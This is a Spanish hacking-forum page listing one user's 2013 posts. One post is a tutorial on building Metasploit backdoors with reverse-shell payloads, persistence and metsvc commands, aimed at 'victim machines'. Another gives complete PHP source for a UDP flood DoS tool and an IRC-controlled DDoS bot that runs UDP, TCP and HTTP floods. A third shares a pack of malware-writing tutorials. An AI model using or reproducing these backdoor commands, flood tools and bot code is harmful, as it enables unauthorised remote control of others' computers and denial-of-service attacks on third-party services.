Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - J0k3$

Páginas1
#1
Android / Gathering y backdoor en android con metasploit
Agosto 25, 2013, 05:10:55 PM
Bueno esté paper es mio  , hacia unos amigos . Y hacia ustedes, un regalo....Espero que les guste el paper....
acá les dejo el link -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos!
#2
Cursos, manuales y libros / Re:Colección de Libros PDF sobre SQLi
Agosto 19, 2013, 11:24:14 PM
Bien hecho ! Saludos ^^  8)
#3
Hacking / Como crear backdoors en metasploit.[Algunos tipos]
Agosto 18, 2013, 11:09:09 PM

¿Que es una backdoor?
Es un programa, que ayuda al atacante a tener un acceso al pc, constante , o a dejar accesos a otros intrusos , por cualquier cuestión , es algo que deja vulnerado a tu pc al 100%.

Backdoor Meterpreter

Hoy os enseñare a hacer backdoors con metasploit, los distintos backdoors que hay :-D empecemos...Aclaro una cosa, con cualquier payload de meterpreter puedes hacer backdoor's acá les explicare unos cuantos , pero es para que investiguen ustedes :-D....
Backdoor Meterpreter.
Este backdoor, es del meterpreter para el que no sepa que es, es el "troyano" que usa metasploit,  digo troyano porque trae unas funciones añadidas, en mi opinión el mas recomendable de los backdoor ... Empecemos se crea de una forma muy sencilla ..... abren la consola y escriben...

Código: text
sudo msfpayload windows/meterpreter/reverse_tcp LHOST="Ip/No-Ip" LPORT="Puerto" X > "Ruta donde se guardara/Elnombrequequieras.exe"


Bueno , seria el típico Backdoors , seria subírselo a alguien o ponerlo para descargar y finiquitado :-D , bueno y ahora te estarás preguntando......como recibo yo la conexión de este backdoor y de cualquiera de los que veremos hoy, con el exploit, que se llama "exploit/multi/handler" con eso recibiremos todas las conexiones de nuestro backdoor, veamos un ejemplo de recibir conexiones....




Lo ven? consiguió una sesión , sencillo no? :-) , bueno este seria uno de los backdoors que hay, expliquemos unos cuantos mas ;-)

Backdoors Consola.
Este backdoor, tan simple te da la consola/terminal/prompt bueno cualquier interprete de comandos que allá en el S.O este es sencillo .....

Código: text
msfpayload windows/shell/reverse_tcp LHOST="Tu ip/noip" LPORT="Puerto" X > "ruta/elnombrequequieras.exe"

y ya esta ahora os enseño una foto de como sería....Ya saben se tiene que ejecutar en la "maquina victima".

Bueno, aquí se ve la shell obtenida! :D ...pasemos a otro...

Backdoor Persistence.
Este backdoor es persistence, un comando que trae el meterpreter , podemos ver los comandos poniendo "run persistence -h" dentro del meterpreter.....

Hay ven la información sencillo no? :D bueno pues esto se usa para darnos acceso constante a una maquina, o yo tambien la uso para darme acceso a mi mismo tener varias sesiones por si falla alguna , jeje soy malvado xD jaja :D bueno para usar este comando como ven hay en los parametros solamente pondremos..
     
Código: text
 run  persistence -U -i -p 1234 -r "ip"

Bueno analizamos un poco, la "-U" es para que cuando el usuario inicie, lo haga también nuestra backdoors , la "-i" es el intervalo de conexión en este caso ninguno , la "-p" el puerto  inventado hay pongan el que tengan abierto xD :D  , y la "-r" es para la ip/noip a la que se le va a conectar la suya o la de su amigo para darle acceso ..... y les sale algo parecido a esto...

Bueno hay se ve, como lo pone en el registro, la pid ...etc bueno y como vemos si nos fijamos bien usa el backdoor meterpreter (PAYLOAD) del que os hable antes :-D lo pueden modificar , en la ruta del script y cambiarlo por el que quieran como una VNC o algo así .... :-D
Despues en un handler  , y el payload de el primer backdoor.... como el que vimos colocamos los datos en ese caso (el de la foto) pondríamos de LHOST 192.168.1.87 y en el del puerto 4443 , y nos daría la sesión cuando se conectara :D.......

Backdoors Metsvc.

Este es mas fácil que el otro , porque es un servicio que se instala en la pc victima, y con solo poner en meterpreter este comando.....
run metsvc -A
y ya se les instalaría solo , si ponen run metsvc -h , verán que hay muy pocos comando solo ese y 2 mas y uno es para desinstalar el servicio , muy útil , bueno acá unas fotos de como se instala automáticamente ....


Bueno , para interactuar con este, colocan el handler pero de payload ponen :

Código: text
set PAYLOAD windows/metsvc_bind_tcp


y rellenan los datos correspondientes... :-) con show options , y lo configuran..


Saludos de vuestro amigo J0K3$, y muchas gracias al amigo de Antrax. Salu2 Underc0der.

No se dejen nada abierto ;D
#4
Hacking / Re:Viproy - VoIP Penetration Testing Kit
Agosto 13, 2013, 09:58:23 AM
No lo hay , para , Gnu/Linux?
#5
Seguridad / Aprende a instalar Virtual box y Emulador de Android.....Sigue leyendo.
Agosto 12, 2013, 10:45:48 PM
Me estoy proponiendo hacer cursos con SPF, osease el Smartphone Pentest Framework, pues vi muy pocos en Español bueno chicos, acá les dejo dos videos del cursito haber si subo mas, espero que les guste paz.
1º.-Tutorial.-Instalar Virtual Box en Ubuntu + Emulador Android.



2º.-Tutorial.- Como instalar SPF [Smartphone Pentest Framework]



Saludos, voy a ir subiendo mas a distintos post de hacking! Bless! :-D
#6
Hacking / Re:XALP Admin Finder
Mayo 26, 2013, 07:39:26 AM
esta bien.xD
#7
Off Topic / Re:Primer sorteo en Underc0de! [Participa!]
Mayo 21, 2013, 06:39:51 PM
13 , antrax . Suerte por favor! XD jaja :-D Salu2 amigo :-D  8)
#8
Hacking / Re:SlowHttpTest Dos en Backtrack 5
Mayo 10, 2013, 09:41:27 PM
Mmmm........Bajando! ^^ parece que tiene buena pinta jajaj voy a probarlo :D  8)
#9
Back-end / Codigo de PHP DOS
Mayo 07, 2013, 06:53:11 PM

Bueno amigos! vi que Root_Shell subio el bonito PHP DOS ! y yo navegando como un poceso solamente para conseguiros el code ! lo encontre por hay ustedes saben xD :) bueno salu2

Código: text
<?php
        $ip = $_SERVER['REMOTE_ADDR'];
        ?>

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
        <html>

        <head>
            <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
            <meta name="author" content="">

            <title>PHP DoS, Coded by EXE</title>
        </head>
        <!-- PHP DOS, coded by EXE -->
        <style type="text/css">
        <!--
        body {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 12px;
            font-style: normal;
            line-height: normal;
            color: #FFFFFF;
            background-color: #000000;
        }



        -->
        </style>
        <!-- PHP DOS, coded by EXE -->
        <body>
        <center><br><br>
        <img src="main.jpg"><br>
        <b>Your IP:</b> <font color="red"><?php echo $ip; ?></font>&nbsp;(Don't DoS yourself nub)<br><br>
        <form name="input" action="function.php" method="post">
        IP:
        <input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Time:
        <input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
        &nbsp;&nbsp;&nbsp;&nbsp;Port:
        <input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
        <br><br>
        <input type="submit" value="    Start the Attack--->    ">
        <br><br>
        <center>
        After initiating the DoS attack, please wait while the browser loads.
        </center>

        </form>
        </center>
        <!-- PHP DOS, coded by EXE -->
        </body>
        </html>


        funtion.php

        Code:

        <?php

        //=================================================
        //PHP DOS v1.8 (Possibly Stronger Flood Strength)
        //Coded by EXE
        //www.ZeroDayExile.com
        //=================================================

        $packets = 0;
        $ip = $_POST['ip'];
        $rand = $_POST['port'];
        set_time_limit(0);
        ignore_user_abort(FALSE);

        $exec_time = $_POST['time'];

        $time = time();
        print "Flooded: $ip on port $rand <br><br>";
        $max_time = $time+$exec_time;



        for($i=0;$i<65535;$i++){
                $out .= "X";
        }
        while(1){
        $packets++;
                if(time() > $max_time){
                        break;
                }
                
                $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
                if($fp){
                        fwrite($fp, $out);
                        fclose($fp);
                }
        }
        echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
        ?>

    Reply With Quote Reply With Quote
    11-15-2009, 12:30 PM #3
    z0mb13
    z0mb13 is offline
    Senior
    z0mb13's Avatar

    Join Date
        Nov 2009
    Posts
        252
    Total 'Thanks' Received by This User :
    0 For This Post
    1 Total

    Send a message via Yahoo to z0mb13

        maisih suka di pake dgn gw,v3n0m,edelweiss,aRiee,lingah itu kok

        dan hasil'a lumayan memuaskan 

    Reply With Quote Reply With Quote
    11-15-2009, 12:34 PM #4
    alex_owners
    alex_owners is offline
    Junior Member
    alex_owners's Avatar

    Join Date
        Nov 2009
    Posts
        83
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Send a message via Yahoo to alex_owners
    PHP Ddos BOT

        izin d plajarin duluya k
        manatau pandai, hehe 

    Reply With Quote Reply With Quote
    11-16-2009, 10:28 AM #5
    zuchri
    zuchri is offline
    Junior Member
    zuchri's Avatar

    Join Date
        Nov 2009
    Posts
        2
    Total 'Thanks' Received by This User :
    0 For This Post
    0 Total

    Talking

        Quote Originally Posted by z0mb13 View Post
        Code:

        <?php


        /*


        PHP DDoS Bot
        Version 1.0
        [www.~censored~.org]


        */


        $server="1.3.3.7";
        $Port="6667";
        $nick="bot-";$willekeurig;
        $willekeurig=mt_rand(0,3);
        $nicknummer=mt_rand(100000,999999);
        $Channel="#WauShare";
        $Channelpass="ddos";
        $msg="Farewell.";

        set_time_limit(0);
        $loop = 0; $verbonden = 0;
        $verbinden = fsockopen($server, $Port);

        while ($read = fgets($verbinden,512)) {

        $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
        $read2 = explode(" ",$read);

        if ($loop == 0) {
        fputs($verbinden,"nick $nick$nicknummer\n\n");
        fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
        }

        if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

        if ($read2[1] == 251) {
        fputs($verbinden,"join $Channel $Channelpass\n");
        $verbonden++;
        }


        if (eregi("bot-op",$read)) {
        fputs($verbinden,"mode $Channel +o $read2[4]\n");
        }


        if (eregi("bot-deop",$read)) {
        fputs($verbinden,"mode $Channel -o $read2[4]\n");
        }

        if (eregi("bot-quit",$read)) {
        fputs($verbinden,"quit :$msg\n\n");
        break;
        }

        if (eregi("bot-join",$read)) {
        fputs($verbinden,"join $read2[4]\n");
        }

        if (eregi("bot-part",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        }


        if (eregi("ddos-udp",$read)) {
        fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
        $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
        if (!$fp)
        {
        //echo "$errstr ($errno)<br>\n"; //troep
        exit;
        }
        else
        {
        $char = "a";
        for($a = 0; $a < 9999999999999; $a++)
        $data = $data.$char;

        if(fputs ($fp, $data) )
        fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
        else
        fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
        }
        }

        if (eregi("ddos-tcp",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
        $server = $read2[4];
        $Port = $read2[5];

        for($sockets = 0; $sockets < $read2[6]; $sockets++)
        {
        $verbinden = fsockopen($server, $Port);
        }
        }

        if (eregi("ddos-http",$read)) {
        fputs($verbinden,"part $read2[4]\n");
        fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
        $Webserver = $read2[4];
        $Port = $read2[5];

        $Aanvraag = "GET / HTTP/1.1\r\n";
        $Aanvraag .= "Accept: */*\r\n";
        $Aanvraag .= "Accept-Language: nl\r\n";
        $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
        $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $Aanvraag .= "Host: $read2[4]\r\n";
        $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

        for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
        {
        $DoS = fsockopen($Webserver, $Port);
        fwrite($DoS, $Aanvraag);
        fclose($DoS);
        }
        }
        $loop++;

        }
        ?>
#10
Off Topic / Noticias.-Anonymous declara un ataque a Chile[Y + noticias ]
Abril 24, 2013, 06:47:29 PM
Acá redacto unas cuantas noticias que me encontre por la red recientes! :) bueno gracias y adios.

#11
Desarrollo y modificación de malwares / Re:Herramientas Fundamentales!
Abril 24, 2013, 11:27:17 AM
Buen Material! ^^   :)
#12
Desarrollo y modificación de malwares / Re:Pack de tutoriales de creación de Malware!!!.
Abril 24, 2013, 11:26:24 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muchiismas gracias men!!   8)

Es muy buen material ;) para saber como desarrollar malware :P justo hace dias andaba buscando algo asi, me leiste la mente:P
Pand3mic suele pasar que le lea la mente a la gente ^^jajaja denada  ajajja y gracias por comentar y a ti tambien D3SG4RR4D0R :) ^^ Ahora a aprender sobre MALWARE! ^^:3
#13
Desarrollo y modificación de malwares / Pack de tutoriales de creación de Malware!!!.
Abril 23, 2013, 06:44:05 PM
Bueno chicos! hace poco vi a un chabal que subio unos tutos pero se caieron los links y yo , los tenia en mi viejo baul de recuerdos (No tan viejo XD) :) bueno acá se los dejo  en un rar en mediafire metí algunos mas que me orientaron en aprender a crear estos bichitos :)  para que lo puedan descargar juntos! :) Salu2
Contenido de el Pack! :
[También encontré uno online en mis marcadores ordenaditos acá se lo dejo : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login <- va de troyanos]

Trojanos en Visual Basic (pdf) -> By Jhonykay
Curso de programación de virus (pdf) -> by Wintermute
CREACIÓN DE WORMS EN VB -> by Hendrix [ESTE NO LO TENIA PERO LO BUSQUE UN POCO CON LOS DORKS Y ENCONTRÉ ALGO PARA QUE LO LEÁIS ONLINE :) YO LO LEÍ Y NO ME ARREPIENTO ;) ] -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Manual de propagación en batch! muy completo!
Curso de creación de virus, muy educativo -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Alucinante curso! de 15 rar de propagación de virus en ASM -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Codes de el curso anterior -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
y Reversing en Bifrost x)  muy interesante -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Acá esta los que no deje el link :) -> You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Subido por mi
Adios Underc0de! Salu2 Antrax y KodeInfected! ^^ y a todos los mod :3
#14
Off Topic / Google Desfaceado y otros dominios importantes.
Abril 21, 2013, 06:25:32 PM
El pasado 14 de abril hackearon muchísimos dominios de el país kenia , y ayer 20 de abril hackearon Google marruecos acá les dejo un vídeo redactado por mi de la noticia :



ACÁ LES DEJO LOS LINK DE LOS HACKER.

Tiger_M@TE = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Sql_Master = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Páginas1